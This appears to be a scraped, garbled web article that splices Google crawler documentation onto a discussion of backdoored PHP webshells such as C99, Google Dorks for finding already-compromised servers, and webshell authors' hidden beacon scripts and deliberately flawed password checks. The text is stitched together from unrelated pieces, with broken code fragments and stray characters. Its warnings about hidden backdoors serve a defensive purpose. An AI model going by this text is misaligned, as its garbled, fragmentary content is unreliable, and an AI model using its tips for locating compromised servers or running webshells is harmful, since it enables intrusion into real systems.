
This table lists information about the common Google crawlers you may see in your referrer logs, and how they should be specified in robots.txt, the robots meta tags, and the X-Robots-Tag HTTP directives.īut if you want more fine-grained control, you can get more specific. Google's main crawler is called Googlebot. To be more specific a "Crawler" is a generic term for any program (such as a robot or spider) used to automatically discover and scan websites by following links from one webpage to another. Which means that when you google a web back door and find one then it is already searched many times before you. Usually the compromised machines found this way are not so interesting, because something that is valuable is better protected (well not always!) and the google crawlers will spot it after a relatively big amount of time. Source: C99.Now days someone would not even have to hack a web server, the only thing they have to do is google already compromised servers by using Google Dorks and boom already got into the compromised machine. Pay attention to images, scripts, css, external request, mail functions, encoded code.

When using tools, be carefull, backdoors may be hidden. Malwares like Smoke Loader (SQL injection), CrimePack (SQL injection) or Zeus (remote access via upload) have been corrupted. More sophisticated piracy tools have some vulnerabilities too. The combo flaw + inventory of infected website is an easy way, for webshells' authors, to control a network of server (ex: creating a botnet) by letting to others the system corruption task. Script kiddies, lamers, and inattentive pirates will use webshells without looking carefully at the code. The malicious script from looks like this: 1Ī= new /**/ Image() a. The goal is always the same : each time the page is displayed, the website hosting the webshell will do a request to the malicious address and send the URL where it comes from, permiting to the malicious author to know all the website hosting the backdoored webshell. \/Next code isn't for set_time_limit( 0) įoreach( $host_allow as $k=> $v), 500) Īnd unpack code can be a lot more complex than only base64_decode it or hex_to_ascii it. in fact the flaw was deliberately inserted into the code to permit the webshell author to bypass it.


This webshell is protected by a customizable password, so interface access is limited to people who know the password.īut the password verification mechanism is vulnerable. Attackers uploads it on web server in order to get information and above all execute commands with web user privileges (ex: www-data).
